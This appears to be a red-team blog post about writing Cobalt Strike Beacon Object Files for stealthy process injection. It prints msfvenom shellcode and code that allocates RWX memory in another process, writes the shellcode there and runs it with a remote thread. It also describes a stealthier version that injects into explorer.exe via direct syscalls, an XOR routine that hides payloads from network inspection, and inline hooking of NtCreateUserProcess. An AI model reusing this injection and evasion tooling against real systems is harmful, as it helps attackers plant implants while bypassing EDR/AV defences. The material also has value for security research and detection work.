Week 3

I still haven’t solved the memcpy mystery from last week, but I did succeed in developing some Beacon Object Files that help Red Teams fly under the radar.

1. Printf(“Hello again, world!\n”);

Last week I talked about Virtual Address Space, Userland-hooking, how Windows organizes and differentiates between User Space and Kernel Space and how I can leverage the entire situation using direct syscalls to bypass EDR/AV.

Today I’ll dive deeper into the intricacies of process injection.

The process of process injection (see what I did there) usually follows a few basic steps.

  1. Get a handle to the process we want to inject into
  2. Allocate some memory into the target process with READ, WRITE, EXECUTE permissions
  3. Write our malicious code to the allocated memory
  4. Get the target process to execute our malicious code

Easier said than done. Processes don’t particularly like it when you start messing with their memory and threads, and more often than not will crash. With these basics in mind, I started working on my own Beacon Object File that could inject shellcode into a process. All I needed were some WIN32 API functions that would perform the aforementioned steps.

There are some great resources out there on the topic of process injection, like Windows Process Injection in 2019 by Safebreach Labs. I decided to start with the easiest and most stable approach: spawning my own process. The way I wanted to approach this, was to stay away from loading DLLs and instead inject raw shellcode.

“What is shellcode and what does it look like?”, I can hear you ask. Shellcode is a tiny program, written directly in assembly in the form of opcodes and operands. Opcodes, or operation codes, are the hexadecimal representation of assembly instructions, operands are the hexadecimal respresentation of CPU registers, flags, numbers, and so on.

For all my payloads I will be using x64 shellcode to start calc.exe, the Windows calculator.

//generated with: msfvenom -p windows/x64/exec CMD=calc.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

2. 𝅘𝅥 𝅘𝅥𝅮 Allocate, Write, Inject, Repeat 𝅘𝅥𝅯 𝅘𝅥𝅯

First things first. We need to spawn a new process to inject into. To spawn a new process, we can use the CreateProcessA function contained in kernel32.dll. We only need a few basic parameters to start a new instance of calc.exe.

//holds information about the newly created process, like: process ID, main thread ID, and handles
PROCESS_INFORMATION pi;
//specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time
STARTUPINFO si;

//set the memory to 0
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));

//create a new instance of windows calculator
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);

To use our newly spawned process, we need to obtain a handle to it. We can use the OpenProcess function contained in kernel32.dll. For the sake of keeping this blogpost somewhat short (who am I kidding), we will assume we know the process ID (PID) of our calc.exe process. In practice I utilise code to enumerate all the running processes on the machine until I have found calculator.exe.

DWORD pid = 6969; //calc.exe
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

Armed with the process handle, we can now allocate some memory, which we will later use to write our shellcode to. To do this, we use the VirtualAllocEx function contained in kernel32.dll. It is important to specify PAGE_EXECUTE_READWRITE, so we later have permission to execude the code located in this memory block. By default, memory that is writeable is not executable and vice versa.

LPVOID shellcode_address = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

The final step before execution, is writing our shellcode to the memory block we just allocated in the target process. To do this, we use the WriteProcessMemory function contained in kernel32.dll.

WriteProcessMemory(hProcess, shellcode_address, shellcode, sizeof(shellcode), NULL);

Now all that’s left is to make the target process execute our shellcode. There are multiple ways to go about this, but to keep things easy we will use the CreateRemoteThread function contained in kernel32.dll to start up a new thread in the target process which will then execute our shellcode.

CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcode_address, shellcode_address, 0, NULL);
CloseHandle(hProcess); //clean up

3. Look mom, no process!

Yikes, kernel32.dll. This wouldn’t fly under any radar.

You’re right. The method we used earlier to spawn a new process and inject our shellcode into it, is probably the most well known, noisy, easily detected, non-sophisticated way of doing things. But we need to learn how to walk before we can run.

To spice things up and make something that will actually bypass EDR/AV, I needed to make some changes. First and foremost I had to get rid of the process creation. Spawning new processes is incredibly noisy and obvious. Instead we can scour the lands of Microsoft Windows in search for a process that blends in well and is usually present on any Windows system (looking at you explorer.exe).

So, to start things of, I’ll enumerate all the running processes on the system until I find explorer.exe, grab its process ID (PID) and use it to obtain a process handle. To obtain the handle I use NtOpenProcess contained in ntdll.dll as a direct syscall.

The next steps in the process remain the same, although I use the ntdll.dll versions of the API calls, namely NtAllocateVirtualMemory and NtWriteVirtualMemory, again as direct syscalls.

To wrap up and execute the shellcode, I use the NtCreateThreadEx function contained in ntdll.dll to create a new remote thread in explorer.exe, and clean up our mess with NtClose to close any remaining handles.

4. Let’s cram this into a BOF

BOFs are supposed to be tiny, hence they use dynamic imports to resolve functions. Since I’m using direct syscalls which can’t be dynamically resolved, I have about 900 lines of overhead code that mainly hold the different structures, flags and definitions as well as the raw assembly for the syscalls. These are generated by SysWhispers and InlineWhispers.

The remaining kernel32.dll and libc functions are dynamically imported in a format provided by Cobalt Strike.

//dynamic import for kernel32.dll function
DECLSPEC_IMPORT WINBASEAPI return_type_here WINAPI KERNEL32$FunctionNameHere(PARAMETER_TYPES_HERE);
//dynamic import for libc function
DECLSPEC_IMPORT return_type_here MSVCRT$FunctionNameHere(PARAMETER_TYPES_HERE);

5. Script absolutely EVERYTHING

A good exploit wouldn’t be complete without a great script to go with it. Luckily for me, Cobalt Strike supports something called Aggressor Script which is build on top of Sleep. This allows me to handle payload/shellcode creation/insertion, encryption, and custom user parameters for process creation and/or targetting.

So I created this neat little dialog that allows the user to specify the payload either via file or as base64 encoded string and customize some process spawning properties.

Dialog

The script also performs a 1 byte XOR encryption routine on the payload. This is done to make it harder for appliances to detect shellcode being transported over the network. It looks like this:

sub xor
{
    # $1 = shellcode
    # $2 = key

    local('$buf $key');
    $key = "nice try ;)"

    for($i = 0; $i < strlen($1); $i++)
    {
        $buf .= chr(asc(charAt($1, $i)) ^ $key);
    }

    return $buf;
}

I considered implementing RC4 encryption instead, but since I also have to decrypt the payload on the other side, the overhead is not worth the added benefits. Afterall we’re not going for uncrackable encryption, we just want to mask the shellcode for network inspection.

After confirming the dialog, the payload is successfully injected into explorer.exe and I get a beacon callback.

CreateRemoteThread result

6. And for my final trick, I will…

…spawn a process.

Huh? You just got rid of that.

As mentioned before, process injection is extremely volatile, and more often than not causes the target process to crash. So I set out on an adventure to spawn my own processes using NtCreateUserProcess as a direct syscall, to hopefully get past EDR/AV and not stir up too much noise.

In the days of Windows XP, process creation used to happen in a couple steps, using NtCreateProcess, RtlCreateUserThread and some other functions like NtOpenFile and NtCreateSection. When Microsoft released the epic failure that was Vista, they also changed how process creation works and chucked all the different API calls together into one single call, namely NtCreateUserProcess. When we spawned calc.exe using CreateProcessA, different API’s were called shown in the image below.

CreateProcess flow

At the very bottom we end up with NtCreateUserProcess which will then talk to the kernel or perform some magic to switch to x64 mode.

After a lot of digging for process parameters, their structures and how they need to be initialized, I managed to come up with code that successfully spawns a new calc.exe process in a suspended state with the help of Microwave89’s research on the topic.

<VARIABLE DECLARATION TRUNCATED FOR SPACE>

///We should supply a minimal environment (environment variables). Following one is simple yet fits our needs.
char data[2 * sizeof(ULONGLONG)] = { 'Y', 0x00, 0x3D, 0x00, 'Q', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

protectionInfo.Signer = (UCHAR)PsProtectedSignerNone;
protectionInfo.Type = (UCHAR)PsProtectedTypeNone;
protectionInfo.Audit = 0;

RtlSecureZeroMemory(&userParams, sizeof(RTL_USER_PROCESS_PARAMETERS));
RtlSecureZeroMemory(&attrList, sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE));
RtlSecureZeroMemory(&procInfo, sizeof(PS_CREATE_INFO));

userParams.Length = sizeof(RTL_USER_PROCESS_PARAMETERS);
userParams.MaximumLength = sizeof(RTL_USER_PROCESS_PARAMETERS);
attrList.TotalLength = sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE);
procInfo.Size = sizeof(PS_CREATE_INFO);

userParams.Environment = (WCHAR*)data;
userParams.EnvironmentSize = sizeof(data);
userParams.Flags = RTL_USER_PROCESS_PARAMETERS_NORMALIZED;

attrList.Attributes[0].Attribute = PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE);
attrList.Attributes[0].Size = pProcessImageName->Length;
attrList.Attributes[0].Value = (ULONG_PTR)pProcessImageName->Buffer;

status = NtCreateUserProcess(&hProcess, &hThread, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, NULL, NULL, 0, THREAD_CREATE_FLAGS_CREATE_SUSPENDED, &userParams, &procInfo, &attrList);

However the newly spawned process crashes immediately when execution is resumed, so it is not fit for injection.

7. I’m the EDR now

In an attempt to find a workaround for the extremely limited function parameters, I decided to try and hook NtCreateUserProcess, so when I spawn a process using CreateProcessA, my hook will intercept the call, and I can replace NtCreateUserProcess with my own version, but preserve the function parameters passed by CreateProcessA. Using LoadLibraryA and GetProcAddress I can find the memory address associated with NtCreateUserProcess. Then I’ll read and save the first 6 bytes of the function, and replace them with assembly code to push the address to my trampoline function.

int main()
{
    HINSTANCE library = LoadLibraryA("ntdll.dll");
    SIZE_T bytesRead = 0;

    // get address of the NtCreateUserProcess function in memory
    NtCreateUserProcessAddr = GetProcAddress(library, "NtCreateUserProcess");

    // save the first 6 bytes of the original NtCreateUserProcess function - will need for unhooking
    ReadProcessMemory(GetCurrentProcess(), (LPCVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, 6, &bytesRead);

    // create a patch "push <address of trampoline function>; ret"
    // 0x68 = push imm32, 0xC3 = ret
    // wonky cast to get around C++ ISO rules - https://stackoverflow.com/questions/45134220/how-to-convert-a-pointer-of-type-void-to-void
    void *trampolineAddr = reinterpret_cast<void*>(&trampoline);
    char patch[6] = { 0 };

    memcpy_s(patch, 1, "\x68", 1);
    memcpy_s(patch + 1, 4, &trampolineAddr, 4);
    memcpy_s(patch + 5, 1, "\xC3", 1);

    // patch NtCreateUserProcess
    WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, patch, sizeof(patch), &bytesWritten);

    // Execute code after hooking
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
    return 0;
}

This is what the original NtCreateUserProcess looks like in WinDbg when disassembled.

Original NtCreateUserProcess

After executing main() and patching the function, the bytes at address 0x1b7ae600 are now my \x68 or push and the memory address to my trampoline function 0x02164000. The bytes at 0x1b7ae605 are now \xc3 or ret.

Replaced NtCreateUserProcess

When CreateProcessA calls NtCreateUserProcess, it will instead jmp to my hook trampoline function. The trampoline function acts as a wrapper around my hook function and pushes all the registers onto the stack to preserve them. After it has pushed all the registers it will then call my hooked version of NtCreateUserProcess.

__declspec(naked) NTSTATUS trampoline(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
    printf("Pushing registers\n");
    asm("push rax;"
        "push rbx;"
        "push rcx;"
        "push rdx;"
        "push r8;"
        "push r9;"
        "push r10;"
        "push r11;"
        "push r12;"
        "push r13;"
        "push r14;"
        "push r15;"
        "push rsi;"
        "push rdi;"
        "push rbp;"
        "push rsp;");

    NTSTATUS status = HookedNtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);

    return status;
}

My HookedNtCreateUserProcess function first pops and restores all the registers that were pushed onto the stack by the trampoline function, then it will unpatch the original NtCreateUserProcess and call my direct syscall version of NtCreateUserProcess and pass the parameters we got from CreateProcessA.

NTSTATUS __stdcall HookedNtCreateUserProcess(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
    printf("Hello from hooked NtCreateUserProcess ;)\n");
    printf("Popping registers\n");
    asm("pop rsp;"
        "pop rbp;"
        "pop rdi;"
        "pop rsi;"
        "pop r15;"
        "pop r14;"
        "pop r13;"
        "pop r12;"
        "pop r11;"
        "pop r10;"
        "pop r9;"
        "pop r8;"
        "pop rdx;"
        "pop rcx;"
        "pop rbx;"
        "pop rax;");

    // unpatch
    WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, sizeof(NtCreateUserProcessOriginalBytes), &bytesWritten);

    // call the original
    printf("Calling original\n");
    return NtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);
}

8. Wrapping up

Unfortunately there are still issues with the inline assembly code for NtCreateUserProcess and the fact I’m messing up the stack. I suspect there are certain registers that CreateProcessA expects to remain constant throughout its call to NtCreateUserProcess, hence the trampoline function, but something is still off resulting in a segfault.

Fun fact, in x32 assembly there is something called pushad and popad which pushes and pops all the registers to and from the stack. When x64 came around the corner, they needed space for new instructions, and pushad and popad were sacrificed.

I’m pretty proud I’ve gotten this far. In my humble opinion I have developed a useful, working PoC that can be used by Cobalt Strike to perform stealthy(ish) process injection.

NtDelayExecution(FALSE, 604800000);